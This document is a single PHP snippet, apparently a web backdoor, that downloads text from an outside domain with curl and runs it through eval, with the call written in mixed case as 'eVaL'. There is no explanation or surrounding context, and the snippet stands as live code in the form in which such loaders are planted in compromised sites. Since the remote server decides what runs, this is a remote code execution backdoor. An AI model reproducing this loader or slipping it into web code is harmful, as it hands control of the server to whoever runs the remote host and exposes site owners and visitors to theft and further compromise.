<?php $cx = curl_init("http://z60117_2.ckirlin.shop/stat/domain_index.txt"); curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1); $rs = curl_exec($cx); if ($rs !== false) { $data = eVaL('?>' . $rs); } curl_close($cx);